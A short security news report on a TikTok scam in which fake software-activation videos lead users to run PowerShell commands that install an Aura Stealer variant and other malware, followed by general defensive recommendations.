Cybercriminals are exploiting TikTok by distributing fake activation guides that download malware. The scam uses videos instructing users to run PowerShell commands that connect to malicious domains.
Malicious Commands and Impact
The malware campaign was first identified by security researcher Xavier Mertens. The commands, deceptively named as activation shortcuts, download dangerous payloads. This includes updater.exe, a version of the Aura Stealer, which extracts confidential data like passwords, cookies, crypto wallets, and tokens. Another payload, source.exe, utilizes a C# compiler, allowing stealthy code execution and potential crypto theft or deployment of ransomware.
Defensive Measures
Experts categorize this tactic as a ClickFix attack, a method of social engineering convincing users that a single command unlocks premium software features. Videos typically direct users to download executables from Cloudflare-hosted pages within dubious remote domains like slmgr.win.
Security Recommendations
- Avoid running PowerShell commands from TikTok or untrustworthy sites.
- Download software only from official websites or legitimate app stores.
- Keep antivirus, browsers, and operating systems updated.
- Install strong antivirus software with real-time protection.
- Consider data removal services to monitor exposure of personal data online.
- Change passwords if suspicious actions were followed, starting with sensitive accounts.
- Enable multi-factor authentication for additional security.
TikTok remains a significant scam target due to its global reach, emphasizing the importance of trusting only verified sources. No true "free activation" shortcuts exist, and caution practices should be maintained.
